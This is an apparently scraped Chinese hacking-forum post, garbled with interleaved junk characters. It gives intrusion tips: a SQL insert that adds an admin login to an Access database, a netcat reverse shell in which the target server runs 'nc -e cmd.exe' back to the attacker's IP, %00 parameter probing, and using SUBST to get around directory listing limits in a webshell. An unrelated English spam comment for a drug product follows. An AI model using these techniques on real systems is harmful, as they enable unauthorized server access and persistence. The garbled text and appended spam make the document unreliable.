5 [" i3 E- |2 A6 c& Q 8 z S# m4 F: N) f7 ^知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:1 ?6 a* V6 g0 D& ^& r
Insert into admin(user,pwd) values('test','test')* w) c6 b; K" G ` i
" o+ E- k/ b5 u4 ^5 Z% D
. [3 o" b' M5 K4 l+ T
NC反弹 . X+ m8 p8 C* G9 i先在本机执行: nc -vv -lp 监听的端口 (自己执行) " P4 q9 z) ~. O/ ^$ J然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行) * a) M* `1 Z: _9 |8 u1 q6 g2 ] & A, l* J0 |& o 3 }+ g( \5 y& M3 k q在脚本入侵过程中要经常常试用%00来确认下参数是否有问题 ! F: b3 s1 x# {* |1 x. M ; ^3 z0 c; g4 ^% C有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录5 [, J4 {8 k6 Q
例如:% S9 U1 u3 ~% P3 l
subst k: d:\www\ 用d盘www目录替代k盘 7 z. f K; p) _; o; w8 asubst k: /d 解除K盘代替作者: 匿名 时间: 2017-12-20 02:36
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta